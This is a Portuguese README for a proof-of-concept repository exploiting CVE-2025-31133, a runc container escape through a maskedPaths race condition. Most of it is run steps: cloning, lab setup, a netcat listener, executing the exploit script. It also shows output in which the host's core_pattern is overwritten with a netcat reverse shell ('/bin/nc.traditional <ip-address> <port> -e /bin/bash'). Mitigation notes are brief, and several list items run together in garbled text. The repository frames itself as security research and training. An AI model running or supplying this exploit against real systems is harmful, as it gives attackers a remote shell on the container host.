
Prova de conceito educacional para CVE-2025-31133, uma fuga de contêiner runc via condição de corrida maskedPaths. Inclui configuração de laboratório, script de exploit e orientações de mitigação para pesquisadores de segurança.
Uma demonstração de prova de conceito e ambiente de aprendizado para CVE-2025-31133, uma vulnerabilidade de segurança no runc que permite contornar a proteção maskedPaths por meio de uma condição de corrida. maskedPaths são projetados para impedir que contêineres acessem caminhos sensíveis do sistema de arquivos do host.
https://github.com/user-attachments/assets/d7b4ea43-6cab-4ac5-bb07-08bc46479910
👉 Este repositório é um exemplo prático da mentalidade e técnicas de pesquisa exatas ensinadas no treinamento Black Hat:
O exploit aproveita uma condição de corrida onde:
maskedPaths para proteger arquivos sensíveis (ex.: /proc/sys/kernel/core_pattern)/dev/null) no rootfs do contêinerEste repositório é apenas para fins educacionais.
git clone https://github.com/C-h4ck-0/Learn-about-cve-2025-31133-poc.git
cd Learn-about-cve-2025-31133-poc
O script lab-setup.sh irá:
chmod +x lab-setup.sh
./lab-setup.sh
Verifique se a versão vulnerável do runc está instalada:
runc --version
Você deve ver a versão 1.2.0 ou similar.
nc -lnvp <PORT>
chmod +x cve-2025-31133-exploit.sh
./cve-2025-31133-exploit.sh
Em caso de sucesso, você deve ver:
[*] Compiling race condition exploit binary...
[*] Starting exploit attempts...
[*] Target: /proc/sys/kernel/core_pattern
[*] Backing up /proc/sys/kernel/core_pattern...
[*] Backup created at /tmp/core_pattern.bak
[*] Current content of target:
|/usr/share/apport/apport -p%p -s%s -c%c -d%d -P%P -u%u -g%g -F%F -- %E
====================================================
[*] Testing delay: 5 microseconds
====================================================
X..
[+] ========================================
[+] SUCCESS! Exploit succeeded.
[+] ========================================
[+] Original content:
|/usr/share/apport/apport -p%p -s%s -c%c -d%d -P%P -u%u -g%g -F%F -- %E
------------------------------------------------
[+] Modified content:
|/bin/nc.traditional <ip-address> <port> -e /bin/bash
------------------------------------------------
./exploit.sh: line 148: 7068 Segmentation fault (core dumped) sleep 5
[*] Restoring original content...
[*] Restoration complete.
Uma conexão de shell reverso deve ser estabelecida com seu listener.
Para se proteger contra esta vulnerabilidade:
core_pattern original após uma exploração bem-sucedidaEste projeto é fornecido para fins educacionais. Use com responsabilidade e ética.
Lembre-se: Sempre use ferramentas de pesquisa de segurança de forma responsável e apenas em ambientes que você possui ou tem permissão explícita para testar.